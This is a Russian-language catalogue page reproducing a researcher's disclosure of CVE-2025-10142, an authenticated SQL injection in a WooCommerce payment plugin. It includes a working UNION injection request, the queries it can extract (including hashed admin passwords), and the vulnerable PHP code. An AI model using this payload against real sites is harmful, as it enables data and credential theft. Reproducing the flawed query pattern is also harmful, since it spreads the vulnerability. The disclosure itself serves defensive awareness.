Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
PagSeguro-Connect-Para-WooCommerce-CVE-Report — Disclosure for CVE-2025-10142 | Kitploit
Инструменты/GitHubGitHub/mooseloveti/pagseguro-connect-para-woocommerce-cve-report
Vulnerability AnalysisExploitationWeb Application ExploitationInformation GatheringPenetration Testing
GitHubmooseloveti/pagseguro-connect-para-woocommerce-cve-report

PagSeguro-Connect-Para-WooCommerce-CVE-Report

Disclosure for CVE-2025-10142

Репозиторий

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться
8 месяцев назадЕщё не проверено

PagSeguro-Connect-Para-WooCommerce-CVE-Report

Раскрытие информации о CVE-2025-10142

CVE-2025-10142 - Уязвимость в PagSeguro-Connect-para-WooCommerce

Этот репозиторий раскрывает уязвимость, обнаруженную в PagSeguro-Connect-para-WooCommerce <= 4.44.3, плагине WordPress, разработанном Ricardo Martins.

🛠 Затронутая версия

  • Продукт: PagSeguro-Connect-para-WooCommerce
  • Версия: v4.44.3
  • URL: https://wordpress.org/plugins/pagbank-connect/

🔒 Назначенный CVE

CVE IDТипКомпонентВоздействие
CVE-2025-10142SQL-инъекция аутентифицированного (Shop Manager+)src/Connect/Recurring/Admin/Subscriptions/SubscriptionList.phpАутентифицированный злоумышленник может извлечь данные

🧾 Подробное описание

CVE-2025-10142 — Несанкционированный доступ к базе данных и утечка данных

  • Затронутый компонент: страница администратора rm-pagbank-subscriptions
  • Вектор атаки: Аутентифицированный (Shop Manager или Администратор) через GET-запрос
  • Триггер: Внедряя вредоносный SQL в параметр status, злоумышленник может извлечь конфиденциальные данные из базы данных с помощью UNION-инъекции SQL.
root@kitploit:~
GET /wp-admin/admin.php?page=rm-pagbank-subscriptions&status=' UNION SELECT CAST(version() AS CHAR),2,3,4,5,6,7,8,9,10,11,12,13,14,15 -- -

  • Воздействие: Внедренный SQL выполняется, и результаты отображаются в HTML-таблице на странице администратора. Примеры извлекаемых данных:
    • version() → Версия базы данных
    • user() → Пользователь MySQL
    • database() → Имя базы данных
    • SELECT user_login, user_pass FROM wp_users (хэшированные учетные данные администратора)
    • Любые данные из wp_options, wp_usermeta и т.д.

❓Причина уязвимости

Параметр status напрямую конкатенируется в SQL-запрос без экранирования или использования $wpdb->prepare()

root@kitploit:~
if (!empty($_REQUEST['status'])) {
           $status = sanitize_text_field(wp_unslash($_REQUEST['status']));
           $where .= " AND status = '$status'";
       }

$this->items = $wpdb->get_results(
           $wpdb->prepare(
               "SELECT * FROM {$wpdb->prefix}pagbank_recurring WHERE $where ORDER BY  $orderby $order LIMIT %d OFFSET %d",
               $per_page,
               ($current_page - 1) * $per_page
           ),
           ARRAY_A
       );
...


ひとこと

Поскольку атака возможна от ShopManager, угроза довольно низкая. Было немного сложно проследить обработку, при которой внешний ввод помещается в $where, а затем этот $where напрямую используется в SQL-синтаксисе.

🔍 Обнаружитель

Имя: MooseLove
Роль: Независимый исследователь безопасности / баг-хантер
Контакты: Предоставляются по запросу


📚 Ссылки

  • Продукт: https://wordpress.org/plugins/pagbank-connect/

⚠️ Лицензия

Данное уведомление предоставляется для повышения осведомленности о безопасности. Разрешено свободное распространение с указанием авторства.

Скачать инструмент